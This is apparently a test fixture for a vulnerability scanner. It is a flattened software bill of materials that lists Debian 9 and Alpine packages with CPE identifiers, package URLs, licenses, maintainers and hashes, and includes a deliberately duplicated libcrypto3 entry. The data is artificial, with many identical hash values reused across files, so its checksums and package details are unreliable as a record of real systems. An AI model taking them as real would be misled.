cpe:2.3:a:postgresql_11:postgresql_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-11/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-11.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 44373 Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-client-11 11.15-1.pgdg90+1 Artistic BSD-2-Clause BSD-3-Clause Custom-Unicode Custom-pg_dump Custom-regex GPL-1.0-only PostgreSQL Snowball TCL blf double-metaphone imath nagaysau-ishii rijndael cpe:2.3:a:postgresql-client-11:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-client-11@11.15-1.pgdg90+1?arch=amd64&upstream=postgresql-11&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-client-11:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_11:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_11:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-client-11/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-client-11.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 6465 postgresql-11 Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-client-common 238.pgdg90+1 GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:postgresql-client-common:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-client-common@238.pgdg90+1?arch=all&upstream=postgresql-common&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-client-common:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_common:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_common:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-client-common/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-client-common.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-client-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 188 postgresql-common Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-common 238.pgdg90+1 GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:postgresql-common:postgresql-common:238.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-common@238.pgdg90+1?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-common:postgresql_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_common:postgresql-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_common:postgresql_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_common:238.pgdg90\+1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-common/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-common.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 691 Matthias Klose <doko@debian.org> readline-common 7.0-3 GFDL GPL-3.0-only cpe:2.3:a:readline-common:readline-common:7.0-3:*:*:*:*:*:*:* pkg:deb/debian/readline-common@7.0-3?arch=all&upstream=readline&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:readline-common:readline_common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline_common:readline-common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline_common:readline_common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline:readline-common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline:readline_common:7.0-3:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/readline-common/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/readline-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 89 readline Clint Adams <clint@debian.org> sed 4.4-1 GPL-3.0-only cpe:2.3:a:sed:sed:4.4-1:*:*:*:*:*:*:* pkg:deb/debian/sed@4.4-1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/sed/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/sed.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 799 Anibal Monsalve Salazar <anibal@debian.org> sensible-utils 0.0.9+deb9u1 GPL-2.0-only cpe:2.3:a:sensible-utils:sensible-utils:0.0.9\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/sensible-utils@0.0.9+deb9u1?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:sensible-utils:sensible_utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible_utils:sensible-utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible_utils:sensible_utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible:sensible-utils:0.0.9\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:sensible:sensible_utils:0.0.9\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/sensible-utils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/sensible-utils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 62 Debian Apache Maintainers <debian-apache@lists.debian.org> ssl-cert 1.0.39 BSD-3-Clause cpe:2.3:a:ssl-cert:ssl-cert:1.0.39:*:*:*:*:*:*:* pkg:deb/debian/ssl-cert@1.0.39?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:ssl-cert:ssl_cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl_cert:ssl-cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl_cert:ssl_cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-cert:1.0.39:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_cert:1.0.39:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/ssl-cert/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/ssl-cert.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 63 Debian sysvinit maintainers <pkg-sysvinit-devel@lists.alioth.debian.org> sysvinit-utils 2.88dsf-59.9 GPL-2.0-only cpe:2.3:a:sysvinit-utils:sysvinit-utils:2.88dsf-59.9:*:*:*:*:*:*:* pkg:deb/debian/sysvinit-utils@2.88dsf-59.9?arch=amd64&upstream=sysvinit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:sysvinit-utils:sysvinit_utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit_utils:sysvinit-utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit_utils:sysvinit_utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit:sysvinit-utils:2.88dsf-59.9:*:*:*:*:*:*:* cpe:2.3:a:sysvinit:sysvinit_utils:2.88dsf-59.9:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/sysvinit-utils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/sysvinit-utils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 110 sysvinit Bdale Garbee <bdale@gag.com> tar 1.29b-1.1+deb9u1 GPL-2.0-only GPL-3.0-only cpe:2.3:a:tar:tar:1.29b-1.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/tar@1.29b-1.1+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/tar/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/tar.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/tar.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2774 GNU Libc Maintainers <debian-glibc@lists.debian.org> tzdata 2021a-0+deb9u3 cpe:2.3:a:tzdata:tzdata:2021a-0\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/tzdata@2021a-0+deb9u3?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/tzdata/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/tzdata.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3036 Manoj Srivastava <srivasta@debian.org> ucf 3.0036 GPL-2.0-only cpe:2.3:a:ucf:ucf:3.0036:*:*:*:*:*:*:* pkg:deb/debian/ucf@3.0036?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/ucf/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/ucf.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/ucf.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 191 Debian util-linux Maintainers <ah-util-linux@debian.org> util-linux 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:util-linux:util-linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/util-linux@2.29.2-1+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:util-linux:util_linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util_linux:util-linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util_linux:util_linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util:util-linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:util:util_linux:2.29.2-1\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/util-linux/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/util-linux.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/util-linux.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3558 Jonathan Nieder <jrnieder@gmail.com> xz-utils 5.2.2-1.2+deb9u1 Autoconf GPL-2.0-only GPL-2.0-or-later GPL-3.0-only LGPL-2.0-only LGPL-2.1-only LGPL-2.1-or-later PD PD-debian config-h noderivs permissive-fsf permissive-nowarranty probably-PD cpe:2.3:a:xz-utils:xz-utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/xz-utils@5.2.2-1.2+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:xz-utils:xz_utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz_utils:xz-utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz_utils:xz_utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz:xz-utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:xz:xz_utils:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/xz-utils/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/xz-utils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 515 Mark Brown <broonie@debian.org> zlib1g 1:1.2.8.dfsg-5+deb9u1 cpe:2.3:a:zlib1g:zlib1g:1\:1.2.8.dfsg-5\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/zlib1g@1:1.2.8.dfsg-5+deb9u1?arch=amd64&upstream=zlib&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/zlib1g/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/zlib1g:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 156 zlib Debian Med Packaging <debian-med-packaging@lists.alioth.debian.org> zstd 1.1.2-1+deb9u1 BSD-3-clause-with-patent-grant Expat Zlib cpe:2.3:a:zstd:zstd:1.1.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/zstd@1.1.2-1+deb9u1?arch=amd64&upstream=libzstd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/zstd/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/zstd.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1218 libzstd debian 9 Debian GNU/Linux 9 (stretch) https://bugs.debian.org/ https://www.debian.org/ https://www.debian.org/support support debian Debian GNU/Linux 9 (stretch) stretch 9 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/sbom-insecure/with-duplicates.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 